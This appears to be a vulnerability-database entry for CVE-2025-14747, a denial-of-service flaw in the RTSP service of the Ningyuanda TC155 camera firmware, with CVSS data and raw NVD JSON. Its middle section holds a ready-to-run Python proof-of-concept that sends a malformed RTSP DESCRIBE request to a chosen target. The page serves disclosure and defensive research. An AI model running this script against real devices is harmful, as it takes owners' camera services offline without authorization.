Security Vulnerability Report
中文
CVE-2025-14747 CVSS 4.3 MEDIUM

CVE-2025-14747

Published: 2025-12-16 03:15:57
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ningyuanda TC155 57.0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-14747 PoC - Ningyuanda TC155 RTSP Service DoS # Target: RTSP Service on Ningyuanda TC155 device # Attack Type: Denial of Service via malformed RTSP Describe request import socket import sys def send_malformed_rtsp_request(target_ip, rtsp_port=554): """ Send a malformed RTSP Describe request to trigger DoS condition """ # Crafted malformed RTSP Describe request with invalid headers # This causes service crash or hang on vulnerable devices malformed_request = ( "DESCRIBE rtsp://{}:{}/ RTSP/1.0\r\n" "CSeq: 1\r\n" "User-Agent: PoC-Exploit\r\n" "Accept: application/sdp\r\n" "Authorization: Invalid\x00\x01\x02\r\n" "\r\n" ).format(target_ip, rtsp_port) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, rtsp_port)) print(f"[*] Connected to {target_ip}:{rtsp_port}") print(f"[*] Sending malformed RTSP Describe request...") sock.send(malformed_request.encode('utf-8')) response = sock.recv(4096) print(f"[*] Received response: {response.decode('utf-8', errors='ignore')}") sock.close() print("[+] Malformed request sent successfully") return True except socket.timeout: print("[!] Connection timeout - service may be unresponsive (DoS successful)") return True except ConnectionRefusedError: print("[!] Connection refused - target may be down") return False except Exception as e: print(f"[!] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-14747-poc.py <target_ip> [port]") print("Example: python3 cve-2025-14747-poc.py 192.168.1.100 554") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 554 print(f"[*] CVE-2025-14747 PoC - Ningyuanda TC155 RTSP DoS") print(f"[*] Target: {target}:{port}") send_malformed_rtsp_request(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14747", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:57.467", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 3.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 6.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC8CEF63-8B37-4D17-8C31-4BD41E7B8D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DC27CA3-9706-448B-8C91-E413B1F05656"}]}]}], "references": [{"url": "https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Malformed-RTSP-Describe-Request.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336520", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707196", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.